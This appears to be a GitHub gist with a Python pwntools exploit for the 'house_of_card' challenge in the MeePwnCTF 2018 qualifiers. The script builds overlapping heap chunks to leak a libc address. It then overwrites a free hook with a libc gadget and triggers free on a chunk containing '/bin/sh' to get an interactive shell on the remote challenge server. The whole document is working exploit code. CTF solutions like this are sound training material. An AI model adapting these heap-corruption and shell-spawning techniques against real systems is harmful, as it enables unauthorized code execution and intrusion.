Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exploit.py

Created Jul 15, 2018
Embed
What would you like to do?
MeePwnCTF 2018 Quals house_of_card
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('./libc.so')
elf = ELF('./house_of_card')
context(os='linux', arch=elf.arch)
RHOST = "178.128.87.12"
RPORT = 31336
LHOST = "127.0.0.1"
LPORT = 31336
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./house_of_card'], gdbscript=gdbscript)
else:
conn = process(['./house_of_card'])
# conn = process(['./house_of_card'], env={'LD_PRELOAD': './libc.so'})
if opt == 'a': gdb.attach(conn)
def add(name, size, desc):
conn.sendlineafter('4. Quit', '1')
conn.sendafter('Name :', name)
conn.sendlineafter('Len?', str(size))
conn.sendafter('Description:', desc)
def edit(idx, name, size, desc):
conn.sendlineafter('4. Quit', '2')
conn.sendlineafter('Back.', str(idx))
conn.sendafter('name?', name)
conn.sendlineafter('Len?', str(size))
conn.send(desc)
def delete(idx):
conn.sendlineafter('4. Quit', '3')
conn.sendlineafter('Back.', str(idx))
# exploit
log.info('Pwning')
# overlap chunks for addless leak
add('hogehoge\n', 0x80, 'y'*0x10+'\n')
add('fugafuga\n', 0x80, 'y'*0x10+'\n')
add('piyopiyo\n', 0x80, 'y'*0x10+'\n')
add('bohebohe\n', 0x80, 'y'*0x10+'\n')
edit(1, 'hogehoge'*2+'\n', 0x80+0x80, 'ffffff\n')
edit(1, '/bin/sh\x00\n', 0x80+0x81, 'f'*0xf4 + p64(0xdeadbeef)*4 + p64(0xd0*2+1)+'\n')
delete(2)
add('fugafuga\n', 0xd0-8, 'y'*0x10+'\n')
conn.sendlineafter('4. Quit', '2')
conn.recvuntil('[2] Name : ')
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1c18
dbg('libc_base')
conn.sendline('5')
# overwrite __free_note
add('bohebohe\n', 0x80, 'a'*0x10+'\n')
edit(5, 'bohebohe\n', 0x81, 'a'*0x8c +p64(libc_base+0x3c3788)+'\n')
edit(5, p64(libc_base + 0x456a0) +'\n', 0x80, 'hgoe\n')
delete(1)
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment